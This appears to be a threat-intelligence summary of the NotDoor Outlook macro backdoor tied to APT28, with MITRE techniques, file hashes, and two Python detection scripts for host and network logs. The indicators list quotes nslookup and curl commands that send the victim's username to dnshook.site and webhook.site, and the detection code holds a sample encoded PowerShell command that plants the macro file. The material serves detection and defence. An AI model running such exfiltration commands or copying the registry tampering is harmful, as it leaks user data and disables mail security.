NotDoor Malware Exploits Outlook for Command and Control and Persistence

NotDoor is an Outlook VBA macro backdoor tied to APT28 that uses OneDrive DLL sideloading, encoded PowerShell, and registry modifications to persist, monitor incoming emails for C2 triggers, exfiltrate data, and execute commands. The Splunk Threat Research Team provides detection guidance and Splunk analytic content for identifying indicators like SSPICLI.dll and VbaProject.OTM manipulation. #NotDoor #APT28

Keypoints

  • NotDoor is an Outlook macro backdoor first reported by Lab52 and attributed to APT28 (Fancy Bear) that uses VBA macros in VbaProject.OTM as a C2 channel.
  • Attackers stage four files under C:\ProgramData: OneDrive.exe (legitimate), malicious SSPICLI.dll (sideloaded), tmp7E9C.dll (renamed original), and testtemp.ini (VBA macro payload).
  • OneDrive DLL sideloading (T1574.001) loads the malicious SSPICLI.dll, which references tmp7EC9.dll to avoid crashes and enables payload execution.
  • The malicious DLL runs base64-encoded PowerShell commands (T1027.010) to perform network checks, send username via DNS/webhook, and copy testtemp.ini into the Outlook VBA file location.
  • Outlook macros (T1137.005) are used to monitor incoming emails for triggers, execute code paths, exfiltrate data via email, and run on startup/new mail events.
  • Registry modifications (T1112) change LoadMacroProviderOnBoot, Outlook Security Level (set to enable all macros), and PONT_STRING to suppress warning dialogs and ensure stealthy persistence.
  • Splunk analytic detections include monitoring for encoded PowerShell execution, Outlook registry key modifications, disabled Outlook dialogs by unusual processes, and creation/modification of VbaProject.OTM by non-Outlook processes.
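The host-side detections listed above (encoded PowerShell execution, Outlook security registry changes by unusual processes, and VbaProject.OTM written by something other than Outlook) can be prototyped outside Splunk by running the same logic over process, registry and file events. The block below is an added example, not code from the Splunk blog or from the Lab52 report. The events are constructed Sysmon-style records; the full registry paths (`...\Office\16.0\Outlook\Security\Level` and `...\Outlook\LoadMacroProviderOnBoot`) and the sample `Copy-Item` command are assumptions, since the page names only the value names and the copy step, not the exact command or key paths.

```python
import base64
import os
import re
from typing import Dict, List, Optional, Tuple

# --- Constructed sample telemetry (Sysmon-style fields, not real logs) -------

# Plaintext shaped like the copy step the page describes (testtemp.ini into the
# Outlook VBA location). Assumption: the real NotDoor command is not reproduced.
SAMPLE_PLAINTEXT = r"Copy-Item C:\ProgramData\testtemp.ini $env:APPDATA\Microsoft\Outlook\VbaProject.OTM"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_PLAINTEXT.encode("utf-16le")).decode("ascii")

# Assumption: full registry key paths; the page gives only the value names.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"type": "process",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\ProgramData\OneDrive.exe",
     "cmdline": f"powershell.exe -NoP -W Hidden -enc {SAMPLE_ENCODED}"},
    {"type": "registry", "image": r"C:\ProgramData\OneDrive.exe",
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Office\16.0\Outlook\Security\Level",
     "details": "DWORD (0x00000001)"},
    {"type": "registry", "image": r"C:\ProgramData\OneDrive.exe",
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Office\16.0\Outlook\LoadMacroProviderOnBoot",
     "details": "DWORD (0x00000001)"},
    {"type": "file",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM"},
    # Benign controls: Outlook itself touching its own macro file and key.
    {"type": "file",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "target": r"C:\Users\alice\AppData\Roaming\Microsoft\Outlook\VbaProject.OTM"},
    {"type": "registry",
     "image": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "target": r"HKU\S-1-5-21-1000\Software\Microsoft\Office\16.0\Outlook\Security\Level",
     "details": "DWORD (0x00000003)"},
]

# PowerShell accepts unambiguous prefixes of -EncodedCommand; match the common ones.
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
# Value names from the page; matched as substrings of the lower-cased key path.
OUTLOOK_VALUES = ("loadmacroprovideronboot", "pont_string", r"\outlook\security\level")
# Strings from the page that a decoded NotDoor-style command would reference.
PAYLOAD_MARKERS = ("testtemp.ini", "vbaproject.otm", "dnshook.site", "webhook.site", "nslookup")

Finding = Tuple[str, str]  # (MITRE technique id, human-readable detail)


def decode_encoded_powershell(cmdline: str) -> Optional[str]:
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None  # malformed base64 or odd byte count: not a real encoded command


def is_outlook(image: str) -> bool:
    """True when the acting process image is outlook.exe (any casing, any path)."""
    return os.path.basename(image.replace("\\", "/")).lower() == "outlook.exe"


def check_process(evt: Dict[str, str]) -> List[Finding]:
    decoded = decode_encoded_powershell(evt.get("cmdline", ""))
    if decoded is None:
        return []
    findings = [("T1027.010", f"encoded PowerShell spawned by {evt.get('parent_image', '?')}: {decoded}")]
    hits = [mk for mk in PAYLOAD_MARKERS if mk in decoded.lower()]
    if hits:
        findings.append(("T1137.005", f"decoded command references {', '.join(hits)}"))
    return findings


def check_registry(evt: Dict[str, str]) -> List[Finding]:
    target = evt.get("target", "").lower()
    if not any(v in target for v in OUTLOOK_VALUES):
        return []
    if is_outlook(evt.get("image", "")):
        return []  # Outlook writing its own security settings is expected
    return [("T1112", f"{evt['image']} set {evt['target']} = {evt.get('details', '?')}")]


def check_file(evt: Dict[str, str]) -> List[Finding]:
    target = evt.get("target", "").lower()
    if not target.endswith("vbaproject.otm") or is_outlook(evt.get("image", "")):
        return []
    return [("T1137.005", f"{evt['image']} wrote {evt['target']}")]


CHECKS = {"process": check_process, "registry": check_registry, "file": check_file}


def triage(events: List[Dict[str, str]]) -> List[Finding]:
    """Run every check over every event and return the findings in event order."""
    findings: List[Finding] = []
    for evt in events:
        findings.extend(CHECKS.get(evt.get("type", ""), lambda e: [])(evt))
    return findings


if __name__ == "__main__":
    for technique, detail in triage(SAMPLE_EVENTS):
        print(f"[{technique}] {detail}")
```

The process-name exclusion is the important design choice: Outlook legitimately writes VbaProject.OTM and its own Security\Level value, so the rule keys on who performed the write rather than on the object alone, which is the same shape as the Splunk content described above (creation or modification by non-Outlook processes). Decoding the `-enc` argument before matching means the `testtemp.ini` and `VbaProject.OTM` strings are visible to the rule even though they never appear in the raw command line.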

MITRE Techniques

  • [T1574.001] OneDrive DLL Sideloading – The attacker placed a malicious SSPICLI.dll alongside OneDrive.exe so the legitimate OneDrive executable loads the malicious DLL. Quote: ‘the legitimate OneDrive.exe executable is vulnerable to loading SSPICLI.dll.’
  • [T1027.010] Encoded PowerShell – The malicious DLL executes base64-encoded PowerShell commands to perform network checks and copy the macro payload into AppData. Quote: ‘A couple of them are various network checks… The important one is the command to copy testtemp.ini to a specific directory in AppData.’
  • [T1137.005] Outlook Macro – The VBA macro stored in %APPDATA%\Microsoft\Outlook\VbaProject.otm monitors incoming emails for triggers, executes code on startup/new mail, and acts as a C2/exfiltration channel. Quote: ‘This particular malicious macro acts as a C2 channel. The malware uses several Outlook functions (Application_MAPILogonComplete and Application_NewMailEx) to run code on Outlook startup or when new emails arrive.’
  • [T1112] Modify Registry – The malicious DLL modifies Outlook-related registry keys including LoadMacroProviderOnBoot, the Outlook Security Level, and PONT_STRING to enable macros and suppress dialogs. Quote: ‘One of these is the LoadMacroProviderOnBoot key… In this case we can see that the value is being set to 1 so that all macros are enabled… The value that NotDoor is creating specifically blocks content download warnings.’

Indicators of Compromise

  • [File] Staged and malicious filenames – SSPICLI.dll (malicious sideloaded DLL), tmp7E9C.dll (renamed legit copy), testtemp.ini (VBA macro payload)
  • [File Hash] Malicious file hashes – SSPICLI.dll: 5a88a15a1d764e635462f78a0cd958b17e6d22c716740febc114a408eef66705; testtemp.ini: 8f4bca3c62268fff0458322d111a511e0bcfba255d5ab78c45973bd293379901
  • [File Path] Persistence and macro storage – VbaProject.OTM creation in %APPDATA%\Roaming\Microsoft\Outlook\VbaProject.OTM (copied from C:\ProgramData\testtemp.ini)
  • [Registry] Modified Outlook registry keys – LoadMacroProviderOnBoot set to 1, Outlook Security Level (Level) set to 1, and PONT_STRING modified to suppress dialogs
  • [Network] Webhook/DNS callback patterns – nslookup and curl to webhook/dnshook domains (e.g., nslookup “$env:USERNAME.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook.site”, curl “http://webhook.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?$env:USERNAME”)
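The network indicator above is a pattern rather than a single domain: the victim username is leaked as the leftmost DNS label under a GUID-labelled dnshook.site name, and again as the query string of a webhook.site URL carrying the same GUID. The block below is an added example, not code from the Splunk blog or the Lab52 report; it parses constructed DNS-query and proxy log lines, extracts the username and GUID from both channels, and correlates them by GUID. The log line layout and the username `alice` are assumptions; the GUID and domains are the ones quoted on this page.

```python
import re
from typing import Dict, List, Optional

# Callback domains from the page's IoC list.
CALLBACK_DOMAINS = ("dnshook.site", "webhook.site")
GUID = r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}"
# <username>.<guid>.dnshook.site  (trailing dot tolerated for FQDN-style logs)
DNS_PATTERN = re.compile(rf"(?i)^(?P<user>[^.\s]+)\.(?P<guid>{GUID})\.dnshook\.site\.?$")
# http://webhook.site/<guid>?<username>
HTTP_PATTERN = re.compile(rf"(?i)^https?://webhook\.site/(?P<guid>{GUID})\?(?P<user>[^&\s]*)")

# Constructed sample logs (assumption: key=value DNS-query events and a
# space-separated proxy access log). The hostname WS01 and user alice are made up.
SAMPLE_DNS_LOG = (
    "2025-09-03T10:01:11Z host=WS01 image=C:\\Windows\\System32\\nslookup.exe "
    "query=alice.910cf351-a05d-4f67-ab8e-6f62cfa8e26d.dnshook.site\n"
    "2025-09-03T10:01:12Z host=WS01 image=C:\\Windows\\System32\\svchost.exe "
    "query=login.microsoftonline.com\n"
    "2025-09-03T10:01:13Z host=WS01 image=C:\\Windows\\System32\\curl.exe "
    "query=webhook.site\n"
)
SAMPLE_PROXY_LOG = (
    "2025-09-03T10:01:14Z WS01 GET http://webhook.site/910cf351-a05d-4f67-ab8e-6f62cfa8e26d?alice 200\n"
    "2025-09-03T10:01:15Z WS01 GET https://www.splunk.com/ 200\n"
)


def classify_dns_query(query: str) -> Optional[Dict[str, str]]:
    """Return {'user','guid'} for a username-leaking dnshook.site name, or
    {'domain': ...} for any other lookup of a callback domain, else None."""
    m = DNS_PATTERN.match(query.strip())
    if m:
        return {"user": m.group("user"), "guid": m.group("guid").lower()}
    q = query.strip().lower().rstrip(".")
    for dom in CALLBACK_DOMAINS:
        if q == dom or q.endswith("." + dom):
            return {"domain": dom}
    return None


def classify_url(url: str) -> Optional[Dict[str, str]]:
    """Return {'user','guid'} for a webhook.site callback URL carrying a username."""
    m = HTTP_PATTERN.match(url.strip())
    if not m:
        return None
    return {"user": m.group("user"), "guid": m.group("guid").lower()}


def scan_logs(dns_log: str, proxy_log: str) -> List[Dict[str, str]]:
    """Parse both logs, emit one finding per callback hit, and mark DNS/HTTP
    hits that share a GUID as correlated."""
    findings: List[Dict[str, str]] = []
    for line in dns_log.splitlines():
        fields = dict(kv.split("=", 1) for kv in line.split()[1:] if "=" in kv)
        hit = classify_dns_query(fields.get("query", ""))
        if hit:
            findings.append({"channel": "dns", "host": fields.get("host", "?"),
                             "image": fields.get("image", "?"), **hit})
    for line in proxy_log.splitlines():
        parts = line.split()
        if len(parts) < 4:
            continue
        hit = classify_url(parts[3])
        if hit:
            findings.append({"channel": "http", "host": parts[1], **hit})
    guids_by_channel: Dict[str, set] = {"dns": set(), "http": set()}
    for f in findings:
        if "guid" in f:
            guids_by_channel[f["channel"]].add(f["guid"])
    both = guids_by_channel["dns"] & guids_by_channel["http"]
    for f in findings:
        f["correlated"] = "yes" if f.get("guid") in both else "no"
    return findings


if __name__ == "__main__":
    for f in scan_logs(SAMPLE_DNS_LOG, SAMPLE_PROXY_LOG):
        print(f)
```

Matching on the GUID-plus-username shape rather than on the single GUID from this report keeps the rule useful if the operator rotates the webhook identifier; the bare `webhook.site` lookup from curl.exe is still reported, at lower confidence, so that a name-resolution-only event is not lost.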


Read more: https://www.splunk.com/en_us/blog/security/notdoor-insights-a-closer-look-at-outlook-macros-and-more.html